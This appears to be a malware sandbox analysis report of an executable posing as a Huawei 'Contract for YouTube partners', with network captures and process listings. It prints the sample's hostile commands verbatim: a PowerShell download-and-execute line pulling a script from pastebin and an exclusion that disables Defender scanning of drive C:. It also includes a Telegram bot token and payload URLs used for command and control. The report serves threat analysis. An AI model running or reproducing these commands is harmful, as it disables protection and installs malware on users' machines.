                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 02 50 c9 17 05 60 94 7f b4 56 05 32 06 2b 02 c9 47 fa a5 15 80 83 08 6c 05 20 50 11 c8 ed c0 c0 25 1f d0 0a 40 a1 ea cf 8a bf 98 8b dc a3 1a 70 de fa 2a 09 9f 7a ed 08 e2 2f ca 3f 6f 03 e6 28 30 28 08 95 86 e4 b8 46 c8 9b 3c f1 b3 b5 65 be bd e4 43 f1 47 9f b8 e3 88 73 f5 f8 70 69 3d f2 1b 05 20 63 fa 4a 40 a5 1d 73 c4 19 3b c7 b8 ca bc b2 46 d1 17 e5 9f 18 8f 28 fb a2 dc a3 5f ab fb ca 9c e3 36 47 31 18 ab f8 10 77 51 fe 45 94 7b 51 f2 29 0f ed c7 38 2d 02 d0 aa bf 58 05 a8 08 8c b7 03 9b 43 9f 18 a2 0e 19 d8 0a 40 2b f8 8c c7 71 46 26 fe a2 14 54 26 2a e7 14 73 8e 9d 13 c6 40 4e cc 45 f4 29 00 81 39 5b 73 5c 63 15 20 64 02 d0 ca 3d fa 8a 3f c6 19 0a 3d a4 a1 c2 8f 7c 45 a1 f1 36 7f cc 25 5e 5a 68 05 20 6d 26 00 9d 73 1d f3 99 d8 33 df 3c 24 21 95 82 71
                                                                                                                                                                                            Data Ascii: P`V2+Gl P%@p*z/?o(0(F<eCGspi= cJ@s;F(_6G1wQE{Q)8-XC@+qF&T&*s@NE)9[s\c d=?=|E6%^Zh m&s3<$!q
                                                                                                                                                                                            2025-02-17 18:35:42 UTC12905OUTData Raw: 10 a8 fc e3 99 7f b4 3a 1e ac 39 89 40 3f 96 90 93 ac 43 ca d1 4a e4 69 cc 3c 12 4f 47 79 89 21 03 b7 d9 c9 7e 87 ad 25 a6 7d 24 00 95 4b 5c 6b 81 e3 c1 b4 4d bc a9 ee 93 d8 03 5f 15 a8 67 03 7a e9 a7 35 c4 57 04 60 20 f5 46 21 92 72 cb 49 af cc 9b 4b b4 c6 13 cb bb 71 d0 bc 7e 24 00 45 16 63 41 dc 53 8b b4 97 2a 91 fc 83 50 f6 45 04 72 6e 39 88 a4 9f 27 92 6d 3e b6 a5 f1 b2 6e 29 88 a5 de 28 d8 ef f9 12 48 c0 48 fe c1 b8 04 a0 9e 21 e8 89 f2 bc 0c 94 00 f4 12 d0 4b 3f 5f 09 98 2f 04 b1 78 3b 2e cf 0e 44 02 66 ae 78 31 4d 5e de 54 07 ae ba 82 8a 41 64 e1 73 6d 75 60 2b 04 5b f9 57 aa 03 cf 79 a2 e2 b1 50 cc 2d 17 a1 f4 73 4c 9c 35 98 58 ea 8d 42 2c ee c6 45 24 fd 3c 5e f4 f5 63 45 00 da eb f6 11 80 f3 11 49 bf 51 88 a4 9f 27 92 7f 10 c9 be 88 ad 5d 00 72
                                                                                                                                                                                            Data Ascii: :9@?CJi<OGy!~%}$K\kM_gz5W` F!rIKq~$EcAS*PErn9'm>n)(HH!K?_/x;.Dfx1M^TAdsmu`+[WyP-sL5XB,E$<^cEIQ']r
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 2a d7 bd b9 00 00 ff f4 49 44 41 54 92 e8 35 3d d1 1a 4f 24 ed c6 49 2c fd 3c f6 1d 0e c0 0b be f9 88 05 df e2 e8 5c f4 f4 40 c6 29 00 6b 22 21 58 b7 f9 68 b0 f0 32 b0 08 c1 f6 d9 81 ae 3a 50 15 82 dc 2a ac e7 07 ae b2 7c 3e 07 ef c9 3f 3b 30 3f 37 50 cf 0c e4 f9 81 82 f1 d9 4f d8 bf bf 2b 21 e7 a4 9f a7 47 00 16 f9 07 cc d5 7b 8c c2 cb 51 00 7a 42 e9 e7 f9 84 ed 51 c9 3f 51 cb bc 85 10 49 3f 4f 24 fd 3c 91 f4 f3 44 d2 6e 9c d4 02 af 1f b5 d8 13 f3 e5 d5 17 8b 8c 43 00 c2 b8 c5 9f 98 23 00 3f 30 97 89 13 1f 6c 89 62 9e 39 02 10 69 37 10 5b e7 d0 51 e0 7e 02 70 98 23 c0 5e e4 79 06 cd d5 2c 58 00 96 a3 bc 0b 65 3e 01 58 0b 3f 51 e7 78 d1 e7 c7 ca a7 5f cb 3f 62 54 ff 21 f2 84 24 5e f7 c8 ef cc 4a 3c 87 97 7b a3 08 c0 2c fb 6c 0c 12 81 b9 7f 38 55 80 b3 4c
                                                                                                                                                                                            Data Ascii: *IDAT5=O$I,<\@)k"!Xh2:P*|>?;0?7PO+!G{QzBQ?QI?O$<DnC#?0lb9i7[Q~p#^y,Xe>X?Qx_?bT!$^J<{,l8UL
2025-02-17 18:35:44 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Mon, 17 Feb 2025 18:35:44 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 50001 | 149.154.167.220 | 443 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-17 18:37:11 UTC | 174 | OUT | POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1
Host: api.telegram.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
                                                                                                                                                                                            2025-02-17 18:37:11 UTC253OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 34 36 34 32 34 30 34 39 39 36 26 74 65 78 74 3d 25 44 30 25 39 45 25 44 31 25 38 38 25 44 30 25 42 38 25 44 30 25 42 31 25 44 30 25 42 41 25 44 30 25 42 30 2b 25 44 30 25 42 46 25 44 31 25 38 30 25 44 30 25 42 38 2b 25 44 30 25 42 37 25 44 30 25 42 30 25 44 30 25 42 33 25 44 31 25 38 30 25 44 31 25 38 33 25 44 30 25 42 37 25 44 30 25 42 41 25 44 30 25 42 35 2b 25 44 31 25 38 34 25 44 30 25 42 30 25 44 30 25 42 39 25 44 30 25 42 42 25 44 30 25 42 30 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 38 39 2e 32 33 2e 39 37 2e 32 31 34 25 32 46 54 65 61 6d 25 32 46 42 49 4c 4c 49 2e 65 78 65 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                            Data Ascii: chat_id=-4642404996&text=%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8+%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%B5+%D1%84%D0%B0%D0%B9%D0%BB%D0%B0+http%3A%2F%2F89.23.97.214%2FTeam%2FBILLI.exe%3A+An+error+occurred+while+sending+the+request.
2025-02-17 18:37:12 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Mon, 17 Feb 2025 18:37:12 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                            2025-02-17 18:37:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 50002 | 149.154.167.220 | 443 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-17 18:37:12 UTC | 174 | OUT | POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1
Host: api.telegram.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
                                                                                                                                                                                            2025-02-17 18:37:12 UTC252OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 34 36 34 32 34 30 34 39 39 36 26 74 65 78 74 3d 25 44 30 25 39 45 25 44 31 25 38 38 25 44 30 25 42 38 25 44 30 25 42 31 25 44 30 25 42 41 25 44 30 25 42 30 2b 25 44 30 25 42 46 25 44 31 25 38 30 25 44 30 25 42 38 2b 25 44 30 25 42 37 25 44 30 25 42 30 25 44 30 25 42 33 25 44 31 25 38 30 25 44 31 25 38 33 25 44 30 25 42 37 25 44 30 25 42 41 25 44 30 25 42 35 2b 25 44 31 25 38 34 25 44 30 25 42 30 25 44 30 25 42 39 25 44 30 25 42 42 25 44 30 25 42 30 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 38 39 2e 32 33 2e 39 37 2e 32 31 34 25 32 46 54 65 61 6d 25 32 46 33 32 63 76 2e 65 78 65 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                            Data Ascii: chat_id=-4642404996&text=%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8+%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%B5+%D1%84%D0%B0%D0%B9%D0%BB%D0%B0+http%3A%2F%2F89.23.97.214%2FTeam%2F32cv.exe%3A+An+error+occurred+while+sending+the+request.
                                                                                                                                                                                            2025-02-17 18:37:12 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:37:12 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                            2025-02-17 18:37:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID: 0
Start time: 13:35:20
Start date: 17/02/2025
Path: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe"
Imagebase: 0x7ff779c00000
File size: 72'795'027 bytes
MD5 hash: DD0B202977B83E0C52C2537616C7A620
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:35:21
Start date: 17/02/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 13:35:21
Start date: 17/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:35:22
Start date: 17/02/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 13:35:22
Start date: 17/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 13:35:25
Start date: 17/02/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Imagebase: 0x7ff6e7780000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 13:35:25
Start date: 17/02/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
Imagebase: 0x7ff73e480000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 13:35:35
Start date: 17/02/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 13:35:35
Start date: 17/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true